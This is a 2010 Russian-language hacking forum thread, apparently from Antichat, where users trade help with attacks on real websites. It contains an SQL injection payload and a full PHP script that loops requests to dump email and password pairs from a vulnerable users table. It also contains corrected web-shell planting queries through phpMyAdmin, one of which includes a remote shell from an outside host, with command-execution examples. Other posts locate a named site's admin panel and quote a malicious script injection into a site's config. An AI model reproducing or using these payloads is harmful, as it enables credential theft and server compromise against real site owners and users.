Ваши вопросы по уязвимостям.

MastaBass1 · 14 Nov 2010

Такой вопрос, как написать цикл, для вывода 12 кэсов учеток, если уязвимо s_users , нужно вывести mail и password, не одна программа не смогла сдампить...

Gorev · 15 Nov 2010

MastaBass1 said:

Такой вопрос, как написать цикл, для вывода 12 кэсов учеток, если уязвимо s_users , нужно вывести mail и password, не одна программа не смогла сдампить...
Click to expand...

что вы имеете в виду "если уязвимо s_users" вопрос не понятен..

MastaBass1 · 15 Nov 2010

Gorev said:

что вы имеете в виду "если уязвимо s_users" вопрос не понятен..
Click to expand...

s_users это таблица из нее нужно вывести email: password.

547 · 15 Nov 2010

кэсов??????? это что вообще такое???

MastaBass1 · 15 Nov 2010

547 said:

кэсов??????? это что вообще такое???
Click to expand...

Тысяч!

DeepBlue7 · 15 Nov 2010

MastaBass1 said:

Такой вопрос, как написать цикл, для вывода 12 кэсов учеток, если уязвимо s_users , нужно вывести mail и password, не одна программа не смогла сдампить...
Click to expand...
Code:
union+select+concat_ws(0x2f,mail,password)+from+s_users+limit+1,1-- 
чет тебя вообще не понятно :/

MastaBass1 · 15 Nov 2010

DeepBlue7 said:
Code:
union+select+concat_ws(0x2f,mail,password)+from+s_users+limit+1,1-- 
чет тебя вообще не понятно :/
Click to expand...
Дампить лимитом 12 тысяч учеток вручную?=)
Ты что?

MastaBass1 · 15 Nov 2010

Redwood said:

А эта по твоему по какому принципу дампит?
Тебе нужен программный пример реализации дампа через лимит или что ?
Click to expand...

Нет, мне нужен пример цикла вывода в браузер, с моими параметрами....
Она дампит, эта прога только до 4 лимита....

DeepBlue7 · 15 Nov 2010

MastaBass1 said:

Дампить лимитом 12 тысяч учеток вручную?=)
Ты что?
Click to expand...

Йа кибарк.

MastaBass1 · 15 Nov 2010

Redwood said:

Если руки кривые, значит уже ничего не поможет.
Click to expand...

Не понимаю, если есть проблема и ты не знаешь как помочь, почему нужно вину валить на другого?
Я по-моему ясно объяснил что мне не нужны программы для дампа, мне просто нужен пример составления цикла вывода инъекции.

SeNaP · 15 Nov 2010

MastaBass1 said:

Не понимаю, если есть проблема и ты не знаешь как помочь, почему нужно вину валить на другого?
Я по-моему ясно объяснил что мне не нужны программы для дампа, мне просто нужен пример составления цикла вывода инъекции.
Click to expand...

А в чём собственно проблема? Бери да пиши на PHP цикл и крути limit

Фараон · 15 Nov 2010

Вот скрипт от Dr.Z3r0:

Dr.Z3r0 said:

Скрипт для вывода инфы через LIMIT или еще что нибудь этого рода

Code:

<?php
$set['b']='121212';//Что находится перед выводиомй инфой
$set['e']='212121';//Что находится после выводимой инфы
$set['u']='http://test/news.php?id=';//URL с узвимым параметров В КОНЦЕ(!)
$set['z']='-1 UNION SELECT CONCAT(0x313231323132,TABLE_NAME, 0x2D, COLUMN_NAME, 0x323132313231) FROM INFORMATION_SCHEMA.COLUMNS LIMIT +++counter+++,1/*';//Уязвимый параметр
$set['c']='+++counter+++';//Строка счетчика
$set['f']='0';//Начальное значение счетчика
$set['s']='500';//Конечное значение счетчика
$set['h']='test';//Хост

if(!empty($_GET['b']))$set['b']=$_GET['b'];
if(!empty($_GET['e']))$set['e']=$_GET['e'];
if(!empty($_GET['u']))$set['u']=$_GET['u'];
if(!empty($_GET['z']))$set['z']=$_GET['z'];
if(!empty($_GET['c']))$set['c']=$_GET['c'];
if(!empty($_GET['f']))$set['f']=$_GET['f'];
if(!empty($_GET['s']))$set['s']=$_GET['s'];
if(!empty($_GET['h']))$set['h']=$_GET['h'];

for($i=$set['f'];$i<=$set['s'];$i++)
{
$zapros=str_replace($set['c'],$i,$set['z']);//Изменияем счетчик в уязвимом параметре

//Создаем пакет
$header="GET ".$set['u'].urlencode($zapros)." HTTP/1.0\r\n";
$header.="Accept-Language: en-us,en;q=0.5\r\n";
$header.="Accept-Charset: utf-8,*;q=0.7\r\n";
$header.="Accept: text/html,image/jpeg,image/gif,text/xml,text/plain,image/png,*/*;q=0.5";
$header.="User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50\r\n";
$header.="Connection: keep-alive\r\n";
$header.="Cookie: PHPSESSID=028df047751bfc9a2ee18204eb2d5595\r\n";
$header.='Cookie2: $Version=1'."\r\n";
$header.="Host: ".$set['h']."\r\n\r\n";

$dt="";
$fp=fsockopen($set['h'], 80);
fwrite($fp, $header);
while(!feof($fp)) $dt.=fread($fp, 1024);
fclose($fp);

//Вырезаем необходимую инфу
$dt=substr($dt,strpos($dt,$set['b'])+strlen($set['b']));
$dt=substr($dt,0,strpos($dt,$set['e']));

//Выводим инфу на экран
echo($dt."\r\n");
flush();
}

?>

Click to expand...

Крутит через лимит запросы.

freezed · 15 Nov 2010

Есть инъекция с file_priv:Y, помимо файлов можно читать и директории, но выдает их в слегка нечитаемом виде.
например /:

Есть ли возможность перевести в более читаемый режим и получить хотя бы список файлов/директорий?

Фараон · 15 Nov 2010

freezed said:

Есть инъекция с file_priv:Y, помимо файлов можно читать и директории, но выдает их в слегка нечитаемом виде.
например /:

Есть ли возможность перевести в более читаемый режим и получить хотя бы список файлов/директорий?
Click to expand...

Ссылку дайте, видимо у вас что-то с кодировкой.

freezed · 15 Nov 2010

Думаю, что с кодировкой все нормально, так как с чтением файлов проблем нет.

roddik · 15 Nov 2010

Привет, подскажите плз, где админка в http://www.runiga.ru/ ?

AC//DC · 15 Nov 2010

http://www.runiga.ru/panel/

GroM88 · 16 Nov 2010

Народ) кто знает почему такие траблы при залитии шелла через phpmyadmin
Вообщем имею доступ к пхпмайадмин под root'om с полными правами.
хочу залить шелл.
Мучу такой запрос:

CREATE TABLE `tableshell` (`shell` TEXT);
Click to expand...

INSERT INTRO `tableshell` (`shell`) VALUES ('<? include 'http://site.narod.ru/shell.php' ?>')
Click to expand...

После второго запроса получаю такую ошибку:

#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '`tableshell` (`shell`) VALUES ('<? include 'http://site.narod.ru/shell.php' ?>'' at line 1
Click to expand...

Кто знает почему вылазит эта ошибка?

Пробовал другой выриант:

select '<?php eval($_REQUEST[cmd]); ?>' from mysql.user into outfile 'E:/www.site.ru/shell.php'
Click to expand...

Создается файл в корневой директории сайта.
Но при запросе http://www.site.ru/shell.php?cmd=dir получаю такую ошибку :

Parse error: syntax error, unexpected $end in E:\www.site.ru\shell.php(1) : eval()'d code on line 1
Click to expand...

Что не так делаю? = \

h00lyshit! · 16 Nov 2010

GroM88

В первом случае у тебя нарушен синтаксис, верный запрос выглядит так:

PHP:

INSERT INTRO `tableshell` (`shell`) VALUES ("<? include ('http://site.narod.ru/shell.php'); ?>")

А если учесть, что не на всех серверах включена директива short_open_tag, то так:

PHP:

INSERT INTRO `tableshell` (`shell`) VALUES ("<?php include ('http://site.narod.ru/shell.php'); ?>")

Не забывай, что при таком методе залития, директива allow_url_include - должна находиться в положении On, иначе шелл не проинклудится.

Во втором случае, нарушен синтаксис и отсутствует логика.

Во первых, после команды нужна точка с запятой, например для вывода phpinfo синтаксически верным был бы такой запрос:

PHP:

http://www.site.ru/shell.php?cmd=phpinfo();

Во вторых, если ты собираешься вызывать системные команды, а не просто эвалить php код (команда dir, является системной командой Windows), то нужно использовать соответствующие функции, либо заключать команды в тильды (``), чтобы php понимал, что эту команду нужно выполнить, как команду оболочки.

О функциях исполнения системных команд и их различиях, можешь почитать тут http://www.php.su/functions/?cat=exec

Вывод листинга директорий для Windows систем, c учетом кода, что ты залил, можно получить одним из следующих запросов (если конечно соответствующие функции не отключены на сервере или не включен safe mod):

PHP:

http://www.site.ru/shell.php?cmd=echo `dir`; http://www.site.ru/shell.php?cmd=passthru('dir'); http://www.site.ru/shell.php?cmd=system('dir');

Чакэ · 16 Nov 2010

spiderbuber said:

Сегодня залил шел на ДЛЕшный сайт, заглянул в dbconfig.php и увидел, что до меня тут кто-то уже побавал.. В конце конфига прописано:

PHP:

if ((!isset($_COOKIE['dle_password'])) and ($_SERVER['REMOTE_ADDR']!="ИП_ЖЕРТВЫ") ) { echo <<<HTML <script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://under-click.net/js/if.php?id=7521"></script> HTML; }

Я так понимаю, таким образом тырят куки юзеров.. А вот куда это сливается? Как самаму замутить такой слив?
Click to expand...

это больше на накрутку чего то тянет, по указанному выше адресу попадаем на страницу с фреймом где по идее юзеру парят примерно следующие куки
Set-Cookie: SL_003_0000=_10000_; domain=telefon4je.info; path=/; expires=Sat, 20-Nov-2010 18:35:15 GMT
Set-Cookie: TSUSER=003; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=telefon4je.info
Set-Cookie: SL_2_0000=_0_; domain=telefon4je.info; path=/; expires=Wed, 17-Nov-2010 14:35:15 GMT и переадресовывают 302 редиректом сюда new-xmading.ru

Ваши вопросы по уязвимостям.

MastaBass1 Member

Gorev Level 8

MastaBass1 Member

547 Active Member

MastaBass1 Member

DeepBlue7 Elder - Старейшина

MastaBass1 Member

MastaBass1 Member

DeepBlue7 Elder - Старейшина

MastaBass1 Member

SeNaP Elder - Старейшина

Фараон коКотэ Of Antichat

freezed Member

Фараон коКотэ Of Antichat

freezed Member

roddik Member

AC//DC Active Member

GroM88 Elder - Старейшина

h00lyshit! [From Nobody To Root]

Чакэ Elder - Старейшина

Useful Searches

Ваши вопросы по уязвимостям.

MastaBass1 Member

Gorev Level 8

MastaBass1 Member

547 Active Member

MastaBass1 Member

DeepBlue7 Elder - Старейшина

MastaBass1 Member

MastaBass1 Member

DeepBlue7 Elder - Старейшина

MastaBass1 Member

SeNaP Elder - Старейшина

Фараон коКотэ Of Antichat

freezed Member

Фараон коКотэ Of Antichat

freezed Member

roddik Member

AC//DC Active Member

GroM88 Elder - Старейшина

h00lyshit! [From Nobody To Root]

Чакэ Elder - Старейшина